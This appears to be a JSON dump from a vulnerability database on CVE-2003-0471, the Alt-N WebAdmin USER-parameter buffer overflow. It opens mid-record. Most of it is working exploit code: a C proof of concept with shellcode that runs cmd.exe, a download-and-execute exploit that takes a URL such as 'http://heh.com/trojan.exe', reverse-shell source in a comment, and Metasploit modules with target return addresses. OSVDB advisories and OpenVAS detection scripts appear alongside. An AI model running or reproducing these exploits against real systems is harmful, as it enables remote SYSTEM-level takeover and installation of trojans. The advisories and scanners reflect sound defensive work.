eax,kernel32.loadlibraryA;\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\x8d\\x45\\xf8\"\t\t\t\t// lea eax, dword ptr ss:[ebp-8]\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t 
\"\\xff\\x55\\xf4\"\t\t\t\t// call dword ptr ss:[ebp-c]\r\n\t\t\t\t\t \"\\x58\"\t\t\t\t\t// pop eax\r\n\t\t\t\t\t \"\\x58\"\t\t\t\t\t// pop eax\r\n\t\t\t\t\t \"\\x58\"\t\t\t\t\t// pop eax\r\n\t\t\t\t\t \"\\x33\\xc0\"\t\t\t\t// xor eax,eax\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\xc6\\x45\\xf8\\x63\"\t\t\t// mov byte ptr ss:[ebp-8],63\r\n\t\t\t\t\t \"\\xc6\\x45\\xf9\\x6d\"\t\t\t// mov byte ptr ss:[ebp-7],6d\r\n\t\t\t\t\t \"\\xc6\\x45\\xfa\\x64\"\t\t\t// mov byte ptr ss:[ebp-6],64\r\n\t\t\t\t\t \"\\xc6\\x45\\xfb\\x2e\"\t\t\t// mov byte ptr ss:[ebp-5],2e\r\n\t\t\t\t\t \"\\xc6\\x45\\xfc\\x65\"\t\t\t// mov byte ptr ss:[ebp-4],65\r\n\t\t\t\t\t \"\\xc6\\x45\\xfd\\x78\"\t\t\t// mov byte ptr ss:[ebp-3],78\r\n\t\t\t\t\t \"\\xc6\\x45\\xfe\\x65\"\t\t\t// mov byte ptr ss:[ebp-2],65\r\n\t\t\t\t\t \"\\xb8\\x4a\\x9B\\x01\\x78\"\t\t\t// mov eax, 78019b4a;system() from msvcrt win2ksp2\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\x8d\\x45\\xf8\"\t\t\t\t// lea eax, dword ptr ss:[ebp-8]\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\xff\\x55\\xf4\"\t\t\t\t// call dword ptr ss:[ebp-c]\r\n\t\t\t\t\t \"\\x83\\xc4\\x04\"\t\t\t\t// add esp, 04h\r\n\t\t\t\t\t \"\\x5c\"\t\t\t\t\t// pop esp\r\n\t\t\t\t\t \"\\xc3\";\t\t\t\t// ret\t\t\twe're done!\r\n\r\n\r\n\r\nstruct sockaddr_in victim;\r\nint main(int argc, char **argv) {\r\n\tSOCKET s;\r\n\tWSADATA wsadata;\r\n\tint x;\r\n\tDWORD jmpesp = 0x1005d58d; // jmp esp from 2.0.4 webAdmin.dll...\r\n\tchar exp_buf[5000];\r\n\tchar boom[] = \r\n\t\t\"POST /WebAdmin.dll?View=Logon HTTP/1.1\\r\\n\"\r\n\t\t\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\"\r\n\t\t\"Accept-Language: en-us\\r\\n\"\r\n\t\t\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\t\t\"Accept-Encoding: gzip, deflate\\r\\n\"\r\n\t\t\"User-Agent: Your Mom\\r\\n\"\r\n\t\t\"Host: sh0dan.org\\r\\n\"\r\n\t\t\"Content-Length: 
395\\r\\n\"\r\n\t\t\"Connection: Keep-Alive\\r\\n\"\r\n\t\t\"Cache-Control: no-cache\\r\\n\"\r\n\t\t\"Cookie: User=test; Lang=en; Theme=Standard\\r\\n\\r\\nUser=\";\r\n\tchar o_args[] = \r\n\t\t\"&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\\r\\n\\r\\n\";\r\n\t\r\n if (argc != 3) {\r\n\t\tfprintf(stderr, \"WebAdmin from Alt-N 2.0.4 Remote Exploit Proof Of Concept\\n\");\r\n\t\tfprintf(stderr, \"Werd to Mark Litchfield for finding this easily exploited hole\\n\");\r\n\t\tfprintf(stderr, \"Usage: %s <victim> <port>\\n\", argv[0]);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tWSAStartup(MAKEWORD(2,0),&wsadata);\r\n\tvictim.sin_port = htons(atoi(argv[2]));\r\n\tvictim.sin_addr.s_addr = inet_addr(argv[1]);\r\n\tvictim.sin_family = AF_INET;\r\n\r\n\tmemset(exp_buf, 0x90, 5000);\r\n\tx = strlen(boom);\r\n\tstrncpy(exp_buf, boom, x);\r\n\tx += 168;\r\n\r\n\tmemcpy(exp_buf+x, &jmpesp, 4);\r\n\tx += 4;\r\n\tmemcpy(exp_buf+x, sc, strlen(sc));\r\n\tx += strlen(sc);\r\n\tmemcpy(exp_buf+x, o_args, strlen(o_args));\r\n\tx += strlen(o_args);\r\n\texp_buf[x+1] = 0x00;\r\n\r\n\ts = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);\r\n\tconnect(s, (struct sockaddr *)&victim, sizeof(victim));\r\n\tsend(s, exp_buf, x, 0);\r\n \r\n\tprintf(\"booyah\");\r\n\treturn(0);\r\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22833/"}, {"lastseen": "2016-02-02T19:39:01", "description": "Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (2). CVE-2003-0471. 
Remote exploit for windows platform", "published": "2003-06-24T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2003-06-24T00:00:00", "id": "EDB-ID:22834", "href": "https://www.exploit-db.com/exploits/22834/", "sourceData": "source: http://www.securityfocus.com/bid/8024/info\r\n \r\nAlt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.\r\n\r\n/* WebAdmin.dll remote download exec shellcode. Works on 2.0.3 and 2.0.4 all windows sp's.\r\nOh and my previous exploit, i'm an idiot and 2.0.5 *is* the patch, heh. \r\nThis shellcode was used by ThreaT in his vulnreg.reg exploit, it works quite nicely.\r\nLook at the bottom of the code for some trojan.exe idea's. That one i found somewhere but\r\ni can't remember.\r\nshellcode has one minor suck point, it shows a window on the target host, oh and the exploit\r\ncrashes the server, so make a user account and restart the service. Be Kind.\r\nword to Mark Litchfield for finding this, i suggest anyone who is interested in learning win32\r\nexploitation download this and attempt to exploit it, it's easier than you think.\r\ndon't download directly from alt-n, they patched all of their 'archived' versions. 
heh.\r\nshouts to innercircle you little kittens you....\r\n-wire \r\n*/\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n#define snprintf _snprintf // <-- a big fuck you to ms.\r\n\r\n#pragma comment(lib,\"ws2_32\") \r\n\r\nchar sc[700] = \r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x68\\x5E\\x56\\xC3\\x90\\x8B\\xCC\\xFF\\xD1\\x83\\xC6\\x0E\\x90\\x8B\\xFE\\xAC\" \r\n \"\\x34\\x99\\xAA\\x84\\xC0\\x75\\xF8\"// download and exec ala ThreaT vulnreg exploit.\r\n \"\\x72\\xeb\\xf3\\xa9\\xc2\\xfd\\x12\\x9a\\x12\\xd9\\x95\\x12\\xd1\\x95\\x12\\x58\\x12\\xc5\\xbd\\x91\"\r\n \"\\x12\\xe9\\xa9\\x9a\\xed\\xbd\\x9d\\xa1\\x87\\xec\\xd5\\x12\\xd9\\x81\\x12\\xc1\\xa5\\x9a\\x41\\x12\"\r\n \"\\xc2\\xe1\\x9a\\x41\\x12\\xea\\x85\\x9a\\x69\\xcf\\x12\\xea\\xbd\\x9a\\x69\\xcf\\x12\\xca\\xb9\\x9a\"\r\n \"\\x49\\x12\\xc2\\x81\\xd2\\x12\\xad\\x03\\x9a\\x69\\x9a\\xed\\xbd\\x8d\\x12\\xaf\\xa2\\xed\\xbd\\x81\"\r\n \"\\xed\\x93\\xd2\\xba\\x42\\xec\\x73\\xc1\\xc1\\xaa\\x59\\x5a\\xc6\\xaa\\x50\\xff\\x12\\x95\\xc6\\xc6\"\r\n \"\\x12\\xa5\\x16\\x14\\x9d\\x9e\\x5a\\x12\\x81\\x12\\x5a\\xa2\\x58\\xec\\x04\\x5a\\x72\\xe5\\xaa\\x42\"\r\n \"\\xf1\\xe0\\xdc\\xe1\\xd8\\xf3\\x93\\xf3\\xd2\\xca\\x71\\xe2\\x66\\x66\\x66\\xaa\\x50\\xc8\\xf1\\xec\"\r\n \"\\xeb\\xf5\\xf4\\xff\\x5e\\xdd\\xbd\\x9d\\xf6\\xf7\\x12\\x75\\xc8\\xc8\\xcc\\x66\\x49\\xf1\\xf0\\xf5\"\r\n \"\\xfc\\xd8\\xf3\\x97\\xf3\\xeb\\xf3\\x9b\\x71\\xcc\\x66\\x66\\x66\\xaa\\x42\\xca\\xf1\\xf8\\xb7\\xfc\"\r\n \"\\xe1\\x5f\\xdd\\xbd\\x9d\\xfc\\x12\\x55\\xca\\xca\\xc8\\x66\\xec\\x81\\xca\\x66\\x49\\xaa\\x42\\xf1\"\r\n \"\\xf0\\xf7\\xdc\\xe1\\xf3\\x98\\xf3\\xd2\\xca\\x71\\xb5\\x66\\x66\\x66\\x14\\xd5\\xbd\\x89\\xf3\\x98\"\r\n \"\\xc8\\x66\\x49\\xaa\\x42\\xf1\\xe1\\xf0\\xed\\xc9\\xf3\\x98\\xf3\\xd2\\xca\\x71\\x8b\\x66\\x66\\x66\"\r\n \"\\x66\\x49\\x71\\xe6\\x66\\x66\\x66\";\r\n\r\n\r\nstruct sockaddr_in 
victim;\r\nint main(int argc, char **argv) {\r\n SOCKET s;\r\n WSADATA wsadata;\r\n int x;\r\n unsigned int i;\r\n DWORD jmpesp4 = 0x1005d58d; // jmp esp from 2.0.4 webAdmin.dll...\r\n DWORD jmpesp3 = 0x10071c43; // jmp esp from 2.0.3 webAdmin.dll...\r\n\r\n char exp_buf[5000];\r\n char post[] = \r\n \"POST /WebAdmin.dll?View=Logon HTTP/1.1\\r\\n\"\r\n \"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\"\r\n \"Accept-Language: en-us\\r\\n\"\r\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n \"User-Agent: Your Mom\\r\\n\"\r\n \"Host: sh0dan.org\\r\\n\";\r\n \r\n char rest[] = \r\n \"Connection: Keep-Alive\\r\\n\"\r\n \"Cache-Control: no-cache\\r\\n\"\r\n \"Cookie: User=test; Lang=en; Theme=Standard\\r\\n\\r\\nUser=\";\r\n\r\n char o_args[] = \r\n \"&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\\r\\n\\r\\n\";\r\n \r\n if (argc != 5) {\r\n fprintf(stderr, \"WebAdmin from Alt-N remote LocalSystem exploit.\\n\");\r\n fprintf(stderr, \"Werd to Mark Litchfield for finding this easily exploited hole\\n\");\r\n fprintf(stderr, \"supports version 2.0.3 and 2.0.4 on any sp.\\n\");\r\n fprintf(stderr, \"Usage: %s <victim> <port> <url> <version> where version is 3 or 4\\n\", argv[0]);\r\n fprintf(stderr, \"Ex: %s 192.168.0.1 1000 http://heh.com/trojan.exe 4\\n\", argv[0]); \r\n exit(1);\r\n }\r\n\r\n\r\n WSAStartup(MAKEWORD(2,0),&wsadata);\r\n victim.sin_port = htons(atoi(argv[2]));\r\n victim.sin_addr.s_addr = inet_addr(argv[1]);\r\n victim.sin_family = AF_INET;\r\n\r\n\r\n memset(exp_buf, 0x00, 5000);\r\n \r\n for (i = 0; i < strlen(argv[3]); argv[3][i++] ^=0x99); // xor our url.\r\n\r\n strncat(sc, argv[3], 100); // strcat the xor'd address onto sc.\r\n strncat(sc, \"\\x99\", 1); // xor'd 00\r\n snprintf(exp_buf, 2000, \"%sContent-Length: %d\\r\\n%s\", post, (strlen(sc)+strlen(rest)+168), rest);\r\n\r\n x = strlen(exp_buf);\r\n memset(exp_buf+x, 0x90, 
168);\r\n x += 168;\r\n\r\n if(atoi(argv[4]) == 4) {\r\n memcpy(exp_buf+x, &jmpesp4, 4);\r\n x += 4;\r\n } else if (atoi(argv[4]) == 3) {\r\n memcpy(exp_buf+x, &jmpesp3, 4);\r\n x += 4;\r\n } else {\r\n fprintf(stderr, \"uhm unknown version, try 3 or 4\\n\");\r\n exit(1);\r\n }\r\n\r\n memcpy(exp_buf+x, sc, strlen(sc));\r\n x += strlen(sc);\r\n \r\n memcpy(exp_buf+x, o_args, strlen(o_args));\r\n x += strlen(o_args);\r\n exp_buf[x+1] = 0x00;\r\n\r\n s = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);\r\n if(connect(s, (struct sockaddr *)&victim, sizeof(victim)) < 0) {\r\n fprintf(stderr,\"error couldn't connect\\n\");\r\n\texit(1);\r\n }\r\n send(s, exp_buf, x, 0);\r\n printf(\"sent!\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n/*\r\nripped from somewhere, sorry i forget where i got this.\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\n#define PORT 53\r\n#define IP 192.168.0.21\r\nvoid main(int argc, char *argv[])\r\n{\r\n WSADATA wsaData; \r\n SOCKET hSocket;\r\n STARTUPINFO si;\r\n PROCESS_INFORMATION pi;\r\n struct sockaddr_in adik_sin; \r\n memset(&adik_sin,0,sizeof(adik_sin));\r\n memset(&si,0,sizeof(si));\r\n WSAStartup(MAKEWORD(2,0),&wsaData);\r\n hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);\r\n adik_sin.sin_family = AF_INET;\r\n adik_sin.sin_port = htons(PORT);\r\n adik_sin.sin_addr.s_addr = inet_addr(\"IP\");\r\n connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));\r\n si.cb = sizeof(si);\r\n si.dwFlags = STARTF_USESTDHANDLES;\r\n si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;\r\n CreateProcess(NULL,\"cmd\",NULL,NULL,true,NULL,NULL,NULL,&si,&pi); \r\n ExitProcess(0);\r\n\r\n}\r\n*/\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22834/"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:33", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": 
"Alt-N WebAdmin USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83099", "href": "https://packetstormsecurity.com/files/83099/Alt-N-WebAdmin-USER-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Alt-N WebAdmin USER Buffer Overflow', \n'Description' => %q{ \nAlt-N WebAdmin is prone to a buffer overflow condition. This \nis due to insufficient bounds checking on the USER \nparameter. Successful exploitation could result in code \nexecution with SYSTEM level privileges. 
\n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2003-0471' ], \n[ 'OSVDB', '2207' ], \n[ 'BID', '8024'], \n[ 'NSS', '11771'], \n \n], \n'Privileged' => false, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 830, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll \n['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll \n['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll \n['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll \n], \n'DisclosureDate' => 'Jun 24 2003')) \n \nregister_options([Opt::RPORT(1000)], self.class) \nend \n \n# Identify the target based on the WebAdmin version number \ndef autofilter \nres = send_request_raw({ \n'uri' => '/WebAdmin.DLL' \n}, -1) \n \nif (res and res.body =~ /WebAdmin.*v(2\\..*)$/) \ncase $1 \nwhen /2\\.0\\.4/ \ndatastore['TARGET'] = 0 \nwhen /2\\.0\\.3/ \ndatastore['TARGET'] = 1 \nwhen /2\\.0\\.2/ \ndatastore['TARGET'] = 2 \nwhen /2\\.0\\.1/ \ndatastore['TARGET'] = 3 \nelse \nreturn false \nend \n \nreturn true \nend \n \n# Not vulnerable \nreturn false \nend \n \ndef exploit \n \nuser_cook = rand_text_alphanumeric(2) \npost_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded \npost_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In' \n \nprint_status(\"Sending request...\") \nres = send_request_cgi({ \n'uri' => '/WebAdmin.DLL', \n'query' => 'View=Logon', \n'method' => 'POST', \n'content-type' => 'application/x-www-form-urlencoded', \n'cookie' => \"User=#{user_cook}; Lang=en; Theme=standard\", \n'data' => post_data, \n'headers' => \n{ \n'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png', 
\n'Accept-Language' => 'en', \n'Accept-Charset' => 'iso-8859-1,*,utf-8' \n} \n}, 5) \n \nhandler \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83099/altn_webadmin.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0471"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in WebAdmin. The issue is due to insufficient bounds checking on the USER parameter resulting in a buffer overflow. With a specially crafted request, an attacker can cause code execution with SYSTEM level privileges resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in WebAdmin. The issue is due to insufficient bounds checking on the USER parameter resulting in a buffer overflow. 
With a specially crafted request, an attacker can cause code execution with SYSTEM level privileges resulting in a loss of integrity.\n## References:\n[Nessus Plugin ID:11771](https://vulners.com/search?query=pluginID:11771)\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=105648385900792&w=2\nGeneric Informational URL: http://milw0rm.com/metasploit.php?id=95\nGeneric Exploit URL: http://metasploit.com/projects/Framework/modules/exploits/altn_webadmin.pm\n[CVE-2003-0471](https://vulners.com/cve/CVE-2003-0471)\nBugtraq ID: 8024\n", "modified": "2003-06-24T14:07:18", "published": "2003-06-24T14:07:18", "href": "https://vulners.com/osvdb/OSVDB:2207", "id": "OSVDB:2207", "type": "osvdb", "title": "Alt-N WebAdmin USER Buffer Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0471"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=105647081418155&w=2\n[CVE-2003-0471](https://vulners.com/cve/CVE-2003-0471)\n", "modified": "2003-06-24T17:22:21", "published": "2003-06-24T17:22:21", "href": "https://vulners.com/osvdb/OSVDB:2653", "id": "OSVDB:2653", "type": "osvdb", "title": "WebAdmin WebAdmin.dll Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-08T08:39:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0471"], "description": "webadmin.dll was found on your web server.\n Old versions of this CGI suffered from numerous problems:\n\n - installation path disclosure\n\n - directory traversal, allowing anybody with\n administrative permission on WebAdmin to read any file\n\n - buffer overflow, allowing anybody to run arbitrary code on\n your server with SYSTEM privileges.", "modified": "2020-05-05T00:00:00", "published": 
"2005-11-03T00:00:00", "id": "OPENVAS:136141256231011771", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011771", "type": "openvas", "title": "webadmin.dll detection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# webadmin.dll detection\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11771\");\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(7438, 7439, 8024);\n script_cve_id(\"CVE-2003-0471\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"webadmin.dll detection\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2003 Michel Arboi\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n 
script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version if necessary.\");\n\n script_tag(name:\"summary\", value:\"webadmin.dll was found on your web server.\n Old versions of this CGI suffered from numerous problems:\n\n - installation path disclosure\n\n - directory traversal, allowing anybody with\n administrative permission on WebAdmin to read any file\n\n - buffer overflow, allowing anybody to run arbitrary code on\n your server with SYSTEM privileges.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nres = http_is_cgi_installed_ka( port:port, item:\"webadmin.dll\" );\nif( res ) {\n security_message( port:port );\n}\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-09-19T11:57:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0471"], "description": "webadmin.dll was found on your web server. 
\nOld versions of this CGI suffered from numerous problems:\n - installation path disclosure\n - directory traversal, allowing anybody with \n administrative permission on WebAdmin to read any file\n - buffer overflow, allowing anybody to run arbitrary code on\n your server with SYSTEM privileges.\n\n*** Note that no attack was performed, and the version number was\n*** not checked, so this might be a false alert", "modified": "2017-09-18T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:11771", "href": "http://plugins.openvas.org/nasl.php?oid=11771", "type": "openvas", "title": "webadmin.dll detection", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: webadmin.nasl 7175 2017-09-18 11:55:15Z cfischer $\n# Description: webadmin.dll detection\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"webadmin.dll was found on your web server. 
\nOld versions of this CGI suffered from numerous problems:\n - installation path disclosure\n - directory traversal, allowing anybody with \n administrative permission on WebAdmin to read any file\n - buffer overflow, allowing anybody to run arbitrary code on\n your server with SYSTEM privileges.\n\n*** Note that no attack was performed, and the version number was\n*** not checked, so this might be a false alert\";\n\ntag_solution = \"Upgrade to the latest version if necessary\";\n\n# References:\n# http://www.kamborio.com/?Section=Articles&Mode=select&ID=55\n#\n# From: \"Mark Litchfield\" <mark@ngssoftware.com>\n# To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org, \n# vulndb@securityfocus.com\n# Date: Tue, 24 Jun 2003 15:22:21 -0700\n# Subject: Remote Buffer Overrun WebAdmin.exe\n\nif(description)\n{\n script_id(11771);\n script_version(\"$Revision: 7175 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-18 13:55:15 +0200 (Mon, 18 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(7438, 7439, 8024);\n script_cve_id(\"CVE-2003-0471\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name( \"webadmin.dll detection\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2003 Michel Arboi\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nres = is_cgi_installed_ka(port:port, item:\"webadmin.dll\");\nif (res) 
security_message(port);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2020-07-02T22:48:25", "description": "Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.\n", "published": "2006-01-16T03:48:36", "type": "metasploit", "title": "Alt-N WebAdmin USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/ALTN_WEBADMIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Alt-N WebAdmin USER Buffer Overflow',\n 'Description' => %q{\n Alt-N WebAdmin is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the USER\n parameter. 
Successful exploitation could result in code\n execution with SYSTEM level privileges.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2003-0471' ],\n [ 'OSVDB', '2207' ],\n [ 'BID', '8024'],\n [ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=11771']\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 830,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'StackAdjustment' => -3500,\n\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Automatic', {}],\n ['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll\n ['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll\n ['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll\n ['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 24 2003'))\n\n 